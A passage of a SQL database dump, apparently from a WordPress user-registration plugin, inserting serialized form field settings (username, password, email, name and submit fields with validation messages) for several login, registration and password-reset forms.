07:20:18'),(28,8,2,'user_pass','a:12:{s:2:\"id\";s:9:\"user_pass\";s:4:\"type\";s:8:\"password\";s:13:\"default_field\";s:1:\"1\";s:5:\"label\";s:12:\"New Password\";s:11:\"placeholder\";s:0:\"\";s:7:\"options\";a:7:{s:9:\"minlength\";s:1:\"6\";s:9:\"maxlength\";s:0:\"\";s:14:\"strength_meter\";s:1:\"1\";s:7:\"special\";s:1:\"1\";s:7:\"numeric\";s:1:\"1\";s:9:\"uppercase\";s:1:\"1\";s:9:\"lowercase\";s:1:\"1\";}s:8:\"required\";s:1:\"1\";s:8:\"meta_key\";s:9:\"user_pass\";s:13:\"blank_message\";s:31:\"Password can not be left blank.\";s:6:\"prefix\";s:0:\"\";s:6:\"suffix\";s:0:\"\";s:12:\"ref_field_id\";s:1:\"0\";}',0,1,'2023-03-28 07:20:18'),(29,8,3,'repeat_pass','a:11:{s:2:\"id\";s:11:\"repeat_pass\";s:4:\"type\";s:11:\"repeat_pass\";s:13:\"default_field\";s:1:\"1\";s:5:\"label\";s:16:\"Confirm Password\";s:8:\"required\";s:1:\"1\";s:8:\"meta_key\";s:11:\"repeat_pass\";s:13:\"blank_message\";s:39:\"Confirm Password can not be left blank.\";s:15:\"invalid_message\";s:22:\"Passwords don\'t match.\";s:6:\"prefix\";s:0:\"\";s:6:\"suffix\";s:0:\"\";s:12:\"ref_field_id\";i:28;}',0,1,'2023-03-28 07:20:18'),(30,8,3,'','a:5:{s:2:\"id\";s:6:\"submit\";s:4:\"type\";s:6:\"submit\";s:13:\"default_field\";s:1:\"1\";s:5:\"label\";s:6:\"Submit\";s:8:\"meta_key\";s:0:\"\";}',0,1,'2023-03-28 07:20:18'),(31,9,1,'user_login','a:10:{s:2:\"id\";s:10:\"user_login\";s:5:\"label\";s:8:\"Username\";s:11:\"placeholder\";s:8:\"Username\";s:4:\"type\";s:4:\"text\";s:8:\"meta_key\";s:10:\"user_login\";s:13:\"hide_username\";s:1:\"0\";s:8:\"required\";s:1:\"1\";s:13:\"blank_message\";s:30:\"Username can not be left blank\";s:15:\"invalid_message\";s:27:\"Please enter valid username\";s:13:\"default_field\";s:1:\"1\";}',0,1,'2023-03-28 07:20:18'),(32,9,2,'first_name','a:9:{s:2:\"id\";s:10:\"first_name\";s:5:\"label\";s:10:\"First Name\";s:11:\"placeholder\";s:10:\"First Name\";s:4:\"type\";s:4:\"text\";s:8:\"meta_key\";s:10:\"first_name\";s:8:\"required\";s:1:\"1\";s:14:\"hide_firstname\";s:1:\"0\";s:13:\"blank_message\";s:33:\"First Name can not be left blank.\";s:13:\"default_field\";s:1:\"1\";}',0,1,'2023-03-28 07:20:18'),(33,9,3,'last_name','a:9:{s:2:\"id\";s:9:\"last_name\";s:5:\"label\";s:9:\"Last Name\";s:11:\"placeholder\";s:9:\"Last Name\";s:4:\"type\";s:4:\"text\";s:8:\"meta_key\";s:9:\"last_name\";s:8:\"required\";s:1:\"1\";s:13:\"hide_lastname\";s:1:\"0\";s:13:\"blank_message\";s:32:\"Last Name can not be left blank.\";s:13:\"default_field\";s:1:\"1\";}',0,1,'2023-03-28 07:20:18'),(34,9,4,'user_email','a:9:{s:2:\"id\";s:10:\"user_email\";s:5:\"label\";s:13:\"Email Address\";s:11:\"placeholder\";s:13:\"Email Address\";s:4:\"type\";s:5:\"email\";s:8:\"meta_key\";s:10:\"user_email\";s:8:\"required\";s:1:\"1\";s:13:\"blank_message\";s:36:\"Email Address can not be left blank.\";s:15:\"invalid_message\";s:33:\"Please enter valid email address.\";s:13:\"default_field\";s:1:\"1\";}',0,1,'2023-03-28 07:20:18'),(35,9,5,'user_pass','a:9:{s:2:\"id\";s:9:\"user_pass\";s:5:\"label\";s:8:\"Password\";s:11:\"placeholder\";s:8:\"Password\";s:4:\"type\";s:8:\"password\";s:7:\"options\";a:8:{s:14:\"strength_meter\";s:1:\"1\";s:15:\"strong_password\";s:1:\"0\";s:9:\"minlength\";s:1:\"6\";s:9:\"maxlength\";s:0:\"\";s:7:\"special\";s:1:\"1\";s:7:\"numeric\";s:1:\"1\";s:9:\"uppercase\";s:1:\"1\";s:9:\"lowercase\";s:1:\"1\";}s:8:\"meta_key\";s:9:\"user_pass\";s:8:\"required\";s:1:\"1\";s:13:\"blank_message\";s:31:\"Password can not be left blank.\";s:15:\"invalid_message\";s:28:\"Please enter valid password.\";}',0,1,'2023-03-28 07:20:18'),(36,9,6,'','a:4:{s:2:\"id\";s:6:\"submit\";s:5:\"label\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:13:\"default_field\";s:1:\"1\";}',0,1,'2023-03-28 07:20:18'),(37,10,1,'user_login','a:14:{s:2:\"id\";s:10:\"user_login\";s:4:\"type\";s:4:\"text\";s:13:\"default_field\";s:1:\"1\";s:5:\"label\";s:8:\"Username\";s:11:\"placeholder\";s:8:\"Username\";s:7:\"options\";a:2:{s:9:\"minlength\";s:0:\"\";s:9:\"maxlength\";s:0:\"\";}s:8:\"required\";s:1:\"1\";s:13:\"hide_username\";i:0;s:8:\"meta_key\";s:10:\"user_login\";s:13:\"blank_message\";s:31:\"Username can not be left blank.\";s:15:\"invalid_message\";s:28:\"Please enter valid username.\";s:6:\"prefix\";s:0:\"\";s:6:\"suffix\";s:0:\"\";s:12:\"ref_field_id\";s:1:\"0\";}',0,1,'2023-03-28 07:20:18'),(38,10,2,'user_pass','a:10:{s:2:\"id\";s:9:\"user_pass\";s:5:\"label\";s:8:\"Password\";s:11:\"placeholder\";s:8:\"Password\";s:4:\"type\";s:8:\"password\";s:13:\"default_field\";s:1:\"1\";s:7:\"options\";a:8:{s:14:\"strength_meter\";s:1:\"0\";s:15:\"strong_password\";s:1:\"0\";s:9:\"minlength\";s:1:\"1\";s:9:\"maxlength\";s:1:\"0\";s:7:\"special\";s:1:\"0\";s:7:\"numeric\";s:1:\"0\";s:9:\"uppercase\";s:1:\"0\";s:9:\"lowercase\";s:1:\"0\";}s:8:\"meta_key\";s:9:\"user_pass\";s:8:\"required\";s:1:\"1\";s:13:\"blank_message\";s:31:\"Password can not be left blank.\";s:15:\"invalid_message\";s:27:\"Please enter valid password\";}',0,1,'2023-03-28 07:20:18'),(39,10,3,'rememberme','a:6:{s:2:\"id\";s:10:\"rememberme\";s:4:\"type\";s:10:\"rememberme\";s:13:\"default_field\";s:1:\"1\";s:5:\"label\";s:11:\"Remember me\";s:8:\"meta_key\";s:10:\"rememberme\";s:12:\"ref_field_id\";s:1:\"0\";}',0,1,'2023-03-28 07:20:18'),(40,10,4,'','a:5:{s:2:\"id\";s:6:\"submit\";s:4:\"type\";s:6:\"submit\";s:13:\"default_field\";s:1:\"1\";s:5:\"label\";s:5:\"LOGIN\";s:8:\"meta_key\";s:0:\"\";}',0,1,'2023-03-28 07:20:18'),(41,11,1,'user_login','a:14:{s:2:\"id\";s:10:\"user_login\";s:4:\"type\";s:4:\"text\";s:13:\"default_field\";s:1:\"1\";s:5:\"label\";s:8:\"Username\";s:11:\"placeholder\";s:8:\"Username\";s:7:\"options\";a:2:{s:9:\"minlength\";s:0:\"\";s:9:\"maxlength\";s:0:\"\";}s:8:\"required\";s:1:\"1\";s:13:\"hide_username\";i:0;s:8:\"meta_key\";s:10:\"user_login\";s:13:\"blank_message\";s:31:\"Username can not be left blank.\";s:15:\"invalid_message\";s:28:\"Please enter valid username.\";s:6:\"prefix\";s:0:\"\";s:6:\"suffix\";s:0:\"\";s:12:\"ref_field_id\";s:1:\"0\";}',0,1,'2023-03-28 07:20:18'),(42,11,2,'','a:5:{s:2:\"id\";s:6:\"submit\";s:4:\"type\";s:6:\"submit\";s:13:\"default_field\";s:1:\"1\";s:5:\"label\";s:6:\"Submit\";s:8:\"meta_key\";s:0:\"\";}',0,1,'2023-03-28 07:20:18'),(43,12,2,'user_pass','a:12:{s:2:\"id\";s:9:\"user_pass\";s:4:\"type\";s:8:\"password\";s:13:\"default_field\";s:1:\"1\";s:5:\"label\";s:12:\"New Password\";s:11:\"placeholder\";s:12:\"New Password\";s:7:\"options\";a:7:{s:9:\"minlength\";s:1:\"6\";s:9:\"maxlength\";s:0:\"\";s:14:\"strength_meter\";s:1:\"1\";s:7:\"special\";s:1:\"1\";s:7:\"numeric\";s:1:\"1\";s:9:\"uppercase\";s:1:\"1\";s:9:\"lowercase\";s:1:\"1\";}s:8:\"required\";s:1:\"1\";s:8:\"meta_key\";s:9:\"user_pass\";s:13:\"blank_message\";s:31:\"Password can not be left blank.\";s:6:\"prefix\";s:0:\"\";s:6:\"suffix\";s:0:\"\";s:12:\"ref_field_id\";s:1:\"0\";}',0,1,'2023-03-28 07:20:18'),(44,12,3,'repeat_pass','a:12:{s:2:\"id\";s:11:\"repeat_pass\";s:4:\"type\";s:11:\"repeat_pass\";s:13:\"default_field\";s:1:\"1\";s:5:\"label\";s:16:\"Confirm Password\";s:11:\"placeholder\";s:16:\"Confirm Password\";s:8:\"required\";s:1:\"1\";s:8:\"meta_key\";s:11:\"repeat_pass\";s:13:\"blank_message\";s:39:\"Confirm Password can not be left blank.\";s:15:\"invalid_message\";s:22:\"Passwords don\'t match.\";s:6:\"prefix\";s:0:\"\";s:6:\"suffix\";s:0:\"\";s:12:\"ref_field_id\";i:43;}',0,1,'2023-03-28 07:20:18'),(45,12,3,'','a:5:{s:2:\"id\";s:6:\"submit\";s:4:\"type\";s:6:\"submit\";s:13:\"default_field\";s:1:\"1\";s:5:\"label\";s:6:\"Submit\";s:8:\"meta_key\";s:0:\"\";}',0,1,'2023-03-28 07:20:18'),(46,13,1,'user_login','a:10:{s:2:\"id\";s:10:\"user_login\";s:5:\"label\";s:8:\"Username\";s:11:\"placeholder\";s:8:\"Username\";s:4:\"type\";s:4:\"text\";s:8:\"meta_key\";s:10:\"user_login\";s:8:\"required\";s:1:\"1\";s:13:\"hide_username\";s:1:\"0\";s:13:\"blank_message\";s:30:\"Username can not be left blank\";s:15:\"invalid_message\";s:27:\"Please enter valid username\";s:13:\"default_field\";s:1:\"1\";}',0,1,'2023-03-28 07:20:18'),(47,13,2,'first_name','a:9:{s:2:\"id\";s:10:\"first_name\";s:5:\"label\";s:10:\"First Name\";s:11:\"placeholder\";s:10:\"First Name\";s:4:\"type\";s:4:\"text\";s:8:\"meta_key\";s:10:\"first_name\";s:8:\"required\";s:1:\"1\";s:14:\"hide_firstname\";s:1:\"0\";s:13:\"blank_message\";s:33:\"First Name can not be left blank.\";s:13:\"default_field\";s:1:\"1\";}',0,1,'2023-03-28 07:20:18'),(48,13,3,'last_name','a:9:{s:2:\"id\";s:9:\"last_name\";s:5:\"label\";s:9:\"Last Name\";s:11:\"placeholder\";s:9:\"Last Name\";s:4:\"type\";s:4:\"text\";s:8:\"meta_key\";s:9:\"last_name\";s:8:\"required\";s:1:\"1\";s:13:\"hide_lastname\";s:1:\"0\";s:13:\"blank_message\";s:32:\"Last Name can not be left blank.\";s:13:\"default_field\";s:1:\"1\";}',0,1,'2023-03-28 07:20:18'),(49,13,4,'user_email','a:9:{s:2:\"id\";s:10:\"user_email\";s:5:\"label\";s:13:\"Email Address\";s:11:\"placeholder\";s:13:\"Email Address\";s:4:\"type\";s:5:\"email\";s:8:\"meta_key\";s:10:\"user_email\";s:8:\"required\";s:1:\"1\";s:13:\"blank_message\";s:36:\"Email Address can not be left blank.\";s:15:\"invalid_message\";s:33:\"Please enter valid email address.\";s:13:\"default_field\";s:1:\"1\";}',0,1,'2023-03-28 07:20:18'),(50,13,5,'user_pass','a:9:{s:2:\"id\";s:9:\"user_pass\";s:5:\"label\";s:8:\"Password\";s:11:\"placeholder\";s:8:\"Password\";s:4:\"type\";s:8:\"password\";s:7:\"options\";a:8:{s:14:\"strength_meter\";s:1:\"1\";s:15:\"strong_password\";s:1:\"0\";s:9:\"minlength\";s:1:\"6\";s:9:\"maxlength\";s:0:\"\";s:7:\"special\";s:1:\"1\";s:7:\"numeric\";s:1:\"1\";s:9:\"uppercase\";s:1:\"1\";s:9:\"lowercase\";s:1:\"1\";}s:8:\"meta_key\";s:9:\"user_pass\";s:8:\"required\";s:1:\"1\";s:13:\"blank_message\";s:31:\"Password can not be left blank.\";s:15:\"invalid_message\";s:28:\"Please enter valid password.\";}',0,1,'2023-03-28 07:20:18'),(51,13,6,'','a:4:{s:2:\"id\";s:6:\"submit\";s:5:\"label\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:13:\"default_field\";s:1:\"1\";}',0,1,'2023-03-28 07:20:18'),(52,14,1,'user_login','a:14:{s:2:\"id\";s:10:\"user_login\";s:4:\"type\";s:4:\"text\";s:13:\"default_field\";s:1:\"1\";s:5:\"label\";s:8:\"Username\";s:11:\"placeholder\";s:8:\"Username\";s:7:\"options\";a:2:{s:9:\"minlength\";s:0:\"\";s:9:\"maxlength\";s:0:\"\";}s:8:\"required\";s:1:\"1\";s:8:\"meta_key\";s:10:\"user_login\";s:13:\"hide_username\";i:0;s:13:\"blank_message\";s:31:\"Username can not be left blank.\";s:15:\"invalid_message\";s:28:\"Please enter valid username.\";s:6:\"prefix\";s:0:\"\";s:6:\"suffix\";s:0:\"\";s:12:\"ref_field_id\";s:1:\"0\";}',0,1,'2023-03-28 07:20:18'),(53,14,2,'user_pass','a:10:{s:2:\"id\";s:9:\"user_pass\";s:5:\"label\";s:8:\"Password\";s:11:\"placeholder\";s:8:\"Password\";s:4:\"type\";s:8:\"password\";s:13:\"default_field\";s:1:\"1\";s:7:\"options\";a:8:{s:14:\"strength_meter\";s:1:\"0\";s:15:\"strong_password\";s:1:\"0\";s:9:\"minlength\";s:1:\"1\";s:9:\"maxlength\";s:1:\"0\";s:7:\"special\";s:1:\"0\";s:7:\"numeric\";s:1:\"0\";s:9:\"uppercase\";s:1:\"0\";s:9:\"lowercase\";s:1:\"0\";}s:8:\"meta_key\";s:9:\"user_pass\";s:8:\"required\";s:1:\"1\";s:13:\"blank_message\";s:31:\"Password can not be left blank.\";s:15:\"invalid_message\";s:27:\"Please enter valid password\";}',0,1,'2023-03-28 07:20:18'),(54,14,3,'rememberme','a:7:{s:2:\"id\";s:10:\"rememberme\";s:4:\"type\";s:10:\"rememberme\";s:13:\"default_field\";s:1:\"1\";s:11:\"default_val\";s:7:\"forever\";s:5:\"label\";s:11:\"Remember me\";s:8:\"meta_key\";s:10:\"rememberme\";s:12:\"ref_field_id\";s:1:\"0\";}',0,1,'2023-03-28 07:20:18'),(55,14,4,'','a:5:{s:2:\"id\";s:6:\"submit\";s:4:\"type\";s:6:\"submit\";s:13:\"default_field\";s:1:\"1\";s:5:\"label\";s:5:\"LOGIN\";s:8:\"meta_key\";s:0:\"\";}',0,1,'2023-03-28 07:20:18'),(56,15,1,'user_login','a:14:{s:2:\"id\";s:10:\"user_login\";s:4:\"type\";s:4:\"text\";s:13:\"default_field\";s:1:\"1\";s:5:\"label\";s:8:\"Username\";s:11:\"placeholder\";s:8:\"Username\";s:7:\"options\";a:2:{s:9:\"minlength\";s:0:\"\";s:9:\"maxlength\";s:0:\"\";}s:8:\"required\";s:1:\"1\";s:13:\"hide_username\";i:0;s:8:\"meta_key\";s:10:\"user_login\";s:13:\"blank_message\";s:31:\"Username can not be left blank.\";s:15:\"invalid_message\";s:28:\"Please enter valid username.\";s:6:\"prefix\";s:0:\"\";s:6:\"suffix\";s:0:\"\";s:12:\"ref_field_id\";s:1:\"0\";}',0,1,'2023-03-28 07:20:18'),(57,15,2,'','a:5:{s:2:\"id\";s:6:\"submit\";s:4:\"type\";s:6:\"submit\";s:13:\"default_field\";s:1:\"1\";s:5:\"label\";s:6:\"Submit\";s:8:\"meta_key\";s:0:\"\";}',0,1,'2023-03-28 07:20:18'),(58,16,2,'user_pass','a:12:{s:2:\"id\";s:9:\"user_pass\";s:4:\"type\";s:8:\"password\";s:13:\"default_field\";s:1:\"1\";s:5:\"label\";s:12:\"New Password\";s:11:\"placeholder\";s:12:\"New Password\";s:7:\"options\";a:7:{s:9:\"minlength\";s:1:\"6\";s:9:\"maxlength\";s:0:\"\";s:14:\"strength_meter\";s:1:\"1\";s:7:\"special\";s:1:\"1\";s:7:\"numeric\";s:1:\"1\";s:9:\"uppercase\";s:1:\"1\";s:9:\"lowercase\";s:1:\"1\";}s:8:\"required\";s:1:\"1\";s:8:\"meta_key\";s:9:\"user_pass\";s:13:\"blank_message\";s:31:\"Password can not be left blank.\";s:6:\"prefix\";s:0:\"\";s:6:\"suffix\";s:0:\"\";s:12:\"ref_field_id\";s:1:\"0\";}',0,1,'2023-03-28 07:20:18'),(59,16,3,'repeat_pass','a:12:{s:2:\"id\";s:11:\"repeat_pass\";s:4:\"type\";s:11:\"repeat_pass\";s:13:\"default_field\";s:1:\"1\";s:5:\"label\";s:16:\"Confirm Password\";s:11:\"placeholder\";s:16:\"Confirm Password\";s:8:\"required\";s:1:\"1\";s:8:\"meta_key\";s:11:\"repeat_pass\";s:13:\"blank_message\";s:39:\"Confirm Password can not be left blank.\";s:15:\"invalid_message\";s:22:\"Passwords don\'t match.\";s:6:\"prefix\";s:0:\"\";s:6:\"suffix\";s:0:\"\";s:12:\"ref_field_id\";i:58;}',0,1,'2023-03-28 07:20:18'),(60,16,3,'','a:5:{s:2:\"id\";s:6:\"submit\";s:4:\"type\";s:6:\"submit\";s:13:\"default_field\";s:1:\"1\";s:5:\"label\";s:6:\"Submit\";s:8:\"meta_key\";s:0:\"\";}',0,1,'2023-03-28 07:20:18'),(61,17,1,'user_login','a:10:{s:2:\"id\";s:10:\"user_login\";s:5:\"label\";s:8:\"Username\";s:11:\"placeholder\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:8:\"meta_key\";s:10:\"user_login\";s:8:\"required\";s:1:\"1\";s:13:\"hide_username\";s:1:\"0\";s:13:\"blank_message\";s:30:\"Username can not be left blank\";s:15:\"invalid_message\";s:27:\"Please enter valid username\";s:13:\"default_field\";s:1:\"1\";}',0,1,'2023-03-28 07:20:18'),(62,17,2,'first_name','a:9:{s:2:\"id\";s:10:\"first_name\";s:5:\"label\";s:10:\"First Name\";s:11:\"placeholder\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:8:\"meta_key\";s:10:\"first_name\";s:8:\"required\";s:1:\"1\";s:14:\"hide_firstname\";s:1:\"0\";s:13:\"blank_message\";s:33:\"First Name can not be left blank.\";s:13:\"default_field\";s:1:\"1\";}',0,1,'2023-03-28 07:20:18'),(63,17,3,'last_name','a:9:{s:2:\"id\";s:9:\"last_name\";s:5:\"label\";s:9:\"Last Name\";s:11:\"placeholder\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:8:\"meta_key\";s:9:\"last_name\";s:8:\"required\";s:1:\"1\";s:13:\"hide_lastname\";s:1:\"0\";s:13:\"blank_message\";s:32:\"Last Name can not be left blank.\";s:13:\"default_field\";s:1:\"1\";}',0,1,'2023-03-28 07:20:18'),(64,17,4,'user_email','a:9:{s:2:\"id\";s:10:\"user_email\";s:5:\"label\";s:13:\"Email Address\";s:11:\"placeholder\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:8:\"meta_key\";s:10:\"user_email\";s:8:\"required\";s:1:\"1\";s:13:\"blank_message\";s:36:\"Email Address can not be left blank.\";s:15:\"invalid_message\";s:33:\"Please enter valid email address.\";s:13:\"default_field\";s:1:\"1\";}',0,1,'2023-03-28 07:20:18'),(65,17,5,'user_pass','a:9:{s:2:\"id\";s:9:\"user_pass\";s:5:\"label\";s:8:\"Password\";s:11:\"placeholder\";s:0:\"\";s:4:\"type\";s:8:\"password\";s:7:\"options\";a:8:{s:14:\"strength_meter\";s:1:\"1\";s:15:\"strong_password\";s:1:\"0\";s:9:\"minlength\";s:1:\"6\";s:9:\"maxlength\";s:0:\"\";s:7:\"special\";s:1:\"1\";s:7:\"numeric\";s:1:\"1\";s:9:\"uppercase\";s:1:\"1\";s:9:\"lowercase\";s:1:\"1\";}s:8:\"meta_key\";s:9:\"user_pass\";s:8:\"required\";s:1:\"1\";s:13:\"blank_message\";s:31:\"Password can not be left blank.\";s:15:\"invalid_message\";s:28:\"Please enter valid password.\";}',0,1,'2023-03-28 07:20:18'),(66,17,6,'','a:4:{s:2:\"id\";s:6:\"submit\";s:5:\"label\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:13:\"default_field\";s:1:\"1\";}',0,1,'2023-03-28 07:20:18'),(67,18,1,'user_login','a:14:{s:2:\"id\";s:10:\"user_login\";s:4:\"type\";s:4:\"text\";s:13:\"default_field\";s:1:\"1\";s:5:\"label\";s:8:\"Username\";s:11:\"placeholder\";s:0:\"\";s:7:\"options\";a:2:{s:9:\"minlength\";s:0:\"\";s:9:\"maxlength\";s:0:\"\";}s:8:\"required\";s:1:\"1\";s:13:\"hide_username\";i:0;s:8:\"meta_key\";s:10:\"user_login\";s:13:\"blank_message\";s:31:\"Username can not be left blank.\";s:15:\"invalid_message\";s:28:\"Please enter valid username.\";s:6:\"prefix\";s:0:\"\";s:6:\"suffix\";s:0:\"\";s:12:\"ref_field_id\";s:1:\"0\";}',0,1,'2023-03-28 07:20:18'),(68,18,2,'user_pass','a:10:{s:2:\"id\";s:9:\"user_pass\";s:5:\"label\";s:8:\"Password\";s:11:\"placeholder\";s:0:\"\";s:4:\"type\";s:8:\"password\";s:13:\"default_field\";s:1:\"1\";s:7:\"options\";a:8:{s:14:\"strength_meter\";s:1:\"0\";s:15:\"strong_password\";s:1:\"0\";s:9:\"minlength\";s:1:\"1\";s:9:\"maxlength\";s:1:\"0\";s:7:\"special\";s:1:\"0\";s:7:\"numeric\";s:1:\"0\";s:9:\"uppercase\";s:1:\"0\";s:9:\"lowercase\";s:1:\"0\";}s:8:\"meta_key\";s:9:\"user_pass\";s:8:\"required\";s:1:\"1\";s:13:\"blank_message\";s:31:\"Password can not be left blank.\";s:15:\"invalid_message\";s:27:\"Please enter valid password\";}',0,1,'2023-03-28 07:20:18'),(69,18,3,'rememberme','a:7:{s:2:\"id\";s:10:\"rememberme\";s:4:\"type\";s:10:\"rememberme\";s:13:\"default_field\";s:1:\"1\";s:11:\"default_val\";s:7:\"forever\";s:5:\"label\";s:11:\"Remember me\";s:8:\"meta_key\";s:10:\"rememberme\";s:12:\"ref_field_id\";s:1:\"0\";}',0,1,'2023-03-28 07:20:18'),(70,18,4,'','a:5:{s:2:\"id\";s:6:\"submit\";s:4:\"type\";s:6:\"submit\";s:13:\"default_field\";s:1:\"1\";s:5:\"label\";s:5:\"LOGIN\";s:8:\"meta_key\";s:0:\"\";}',0,1,'2023-03-28 07:20:18'),(71,19,1,'user_login','a:14:{s:2:\"id\";s:10:\"user_login\";s:4:\"type\";s:4:\"text\";s:13:\"default_field\";s:1:\"1\";s:5:\"label\";s:8:\"Username\";s:11:\"placeholder\";s:0:\"\";s:7:\"options\";a:2:{s:9:\"minlength\";s:0:\"\";s:9:\"maxlength\";s:0:\"\";}s:8:\"required\";s:1:\"1\";s:13:\"hide_username\";i:0;s:8:\"meta_key\";s:10:\"user_login\";s:13:\"blank_message\";s:31:\"Username can not be left blank.\";s:15:\"invalid_message\";s:28:\"Please enter valid username.\";s:6:\"prefix\";s:0:\"\";s:6:\"suffix\";s:0:\"\";s:12:\"ref_field_id\";s:1:\"0\";}',0,1,'2023-03-28 07:20:18'),(72,19,2,'','a:5:{s:2:\"id\";s:6:\"submit\";s:4:\"type\";s:6:\"submit\";s:13:\"default_field\";s:1:\"1\";s:5:\"label\";s:6:\"Submit\";s:8:\"meta_key\";s:0:\"\";}',0,1,'2023-03-28 07:20:18'),(73,20,2,'user_pass','a:12:{s:2:\"id\";s:9:\"user_pass\";s:4:\"type\";s:8:\"password\";s:13:\"default_field\";s:1:\"1\";s:5:\"label\";s:12:\"New Password\";s:11:\"placeholder\";s:0:\"\";s:7:\"options\";a:7:{s:9:\"minlength\";s:1:\"6\";s:9:\"maxlength\";s:0:\"\";s:14:\"strength_meter\";s:1:\"1\";s:7:\"special\";s:1:\"1\";s:7:\"numeric\";s:1:\"1\";s:9:\"uppercase\";s:1:\"1\";s:9:\"lowercase\";s:1:\"1\";}s:8:\"required\";s:1:\"1\";s:8:\"meta_key\";s:9:\"user_pass\";s:13:\"blank_message\";s:31:\"Password can not be left blank.\";s:6:\"prefix\";s:0:\"\";s:6:\"suffix\";s:0:\"\";s:12:\"ref_field_id\";s:1:\"0\";}',0,1,'2023-03-28 07:20:18'),(74,20,3,'repeat_pass','a:12:{s:2:\"id\";s:11:\"repeat_pass\";s:4:\"type\";s:11:\"repeat_pass\";s:13:\"default_field\";s:1:\"1\";s:5:\"label\";s:16:\"Confirm Password\";s:11:\"placeholder\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:8:\"meta_key\";s:11:\"repeat_pass\";s:13:\"blank_message\";s:39:\"Confirm Password can not be left blank.\";s:15:\"invalid_message\";s:22:\"Passwords don\'t match.\";s:6:\"prefix\";s:0:\"\";s:6:\"suffix\";s:0:\"\";s:12:\"ref_field_id\";i:73;}',0,1,'2023-03-28 07:20:18'),(75,20,3,'','a:5:{s:2:\"id\";s:6:\"submit\";s:4:\"type\";s:6:\"submit\";s:13:\"default_field\";s:1:\"1\";s:5:\"label\";s:6:\"Submit\";s:8:\"meta_key\";s:0:\"\";}',0,1,'2023-03-28 07:20:18'),(76,101,1,'user_login','a:11:{s:2:\"id\";s:10:\"user_login\";s:5:\"label\";s:8:\"Username\";s:11:\"placeholder\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:8:\"meta_key\";s:10:\"user_login\";s:8:\"required\";i:1;s:13:\"hide_username\";i:0;s:13:\"blank_message\";s:31:\"Username can not be left blank.\";s:15:\"invalid_message\";s:28:\"Please enter valid username.\";s:16:\"invalid_username\";s:56:\"This username is invalid. Please enter a valid username.\";s:13:\"default_field\";i:1;}',0,1,'2023-03-28 07:20:18'),(77,101,2,'first_name','a:10:{s:2:\"id\";s:10:\"first_name\";s:5:\"label\";s:10:\"First Name\";s:11:\"placeholder\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:8:\"meta_key\";s:10:\"first_name\";s:8:\"required\";i:1;s:14:\"hide_firstname\";i:0;s:13:\"blank_message\";s:33:\"First Name can not be left blank.\";s:17:\"invalid_firstname\";s:60:\"This first name is invalid. Please enter a valid first name.\";s:13:\"default_field\";i:1;}',0,1,'2023-03-28 07:20:18'),(78,101,3,'last_name','a:10:{s:2:\"id\";s:9:\"last_name\";s:5:\"label\";s:9:\"Last Name\";s:11:\"placeholder\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:8:\"meta_key\";s:9:\"last_name\";s:8:\"required\";i:1;s:13:\"hide_lastname\";i:0;s:13:\"blank_message\";s:32:\"Last Name can not be left blank.\";s:16:\"invalid_Lastname\";s:58:\"This last name is invalid. Please enter a valid last name.\";s:13:\"default_field\";i:1;}',0,1,'2023-03-28 07:20:18'),(79,101,4,'user_email','a:11:{s:2:\"id\";s:10:\"user_email\";s:5:\"label\";s:13:\"Email Address\";s:11:\"placeholder\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:8:\"meta_key\";s:10:\"user_email\";s:8:\"required\";i:1;s:13:\"blank_message\";s:36:\"Email Address can not be left blank.\";s:15:\"invalid_message\";s:33:\"Please enter valid email address.\";s:13:\"default_field\";i:1;s:12:\"ref_field_id\";i:0;s:19:\"enable_repeat_field\";i:0;}',0,1,'2023-03-28 07:20:18'),(80,101,5,'user_pass','a:9:{s:2:\"id\";s:9:\"user_pass\";s:5:\"label\";s:8:\"Password\";s:11:\"placeholder\";s:0:\"\";s:4:\"type\";s:8:\"password\";s:7:\"options\";a:8:{s:14:\"strength_meter\";i:1;s:15:\"strong_password\";i:0;s:9:\"minlength\";i:6;s:9:\"maxlength\";s:0:\"\";s:7:\"special\";i:1;s:7:\"numeric\";i:1;s:9:\"uppercase\";i:1;s:9:\"lowercase\";i:1;}s:8:\"meta_key\";s:9:\"user_pass\";s:8:\"required\";i:1;s:13:\"blank_message\";s:31:\"Password can not be left blank.\";s:15:\"invalid_message\";s:28:\"Please enter valid password.\";}',0,1,'2023-03-28 07:20:18'),(81,101,6,'','a:4:{s:2:\"id\";s:6:\"submit\";s:5:\"label\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:13:\"default_field\";i:1;}',0,1,'2023-03-28 07:20:18'),(82,102,1,'user_login','a:11:{s:2:\"id\";s:10:\"user_login\";s:5:\"label\";s:8:\"Username\";s:11:\"placeholder\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:8:\"meta_key\";s:10:\"user_login\";s:8:\"required\";i:1;s:13:\"hide_username\";i:0;s:13:\"blank_message\";s:31:\"Username can not be left blank.\";s:15:\"invalid_message\";s:28:\"Please enter valid username.\";s:16:\"invalid_username\";s:56:\"This username is invalid. Please enter a valid username.\";s:13:\"default_field\";i:1;}',0,1,'2023-03-28 07:20:18'),(83,102,2,'user_pass','a:10:{s:2:\"id\";s:9:\"user_pass\";s:5:\"label\";s:8:\"Password\";s:11:\"placeholder\";s:0:\"\";s:4:\"type\";s:8:\"password\";s:7:\"options\";a:8:{s:14:\"strength_meter\";i:0;s:15:\"strong_password\";i:0;s:9:\"minlength\";i:1;s:9:\"maxlength\";s:0:\"\";s:7:\"special\";i:0;s:7:\"numeric\";i:0;s:9:\"uppercase\";i:0;s:9:\"lowercase\";i:0;}s:8:\"meta_key\";s:9:\"user_pass\";s:8:\"required\";i:1;s:13:\"blank_message\";s:31:\"Password can not be left blank.\";s:15:\"invalid_message\";s:28:\"Please enter valid password.\";s:13:\"default_field\";i:1;}',0,1,'2023-03-28 07:20:18'),(84,102,3,'rememberme','a:6:{s:2:\"id\";s:10:\"rememberme\";s:4:\"type\";s:10:\"rememberme\";s:5:\"label\";s:11:\"Remember 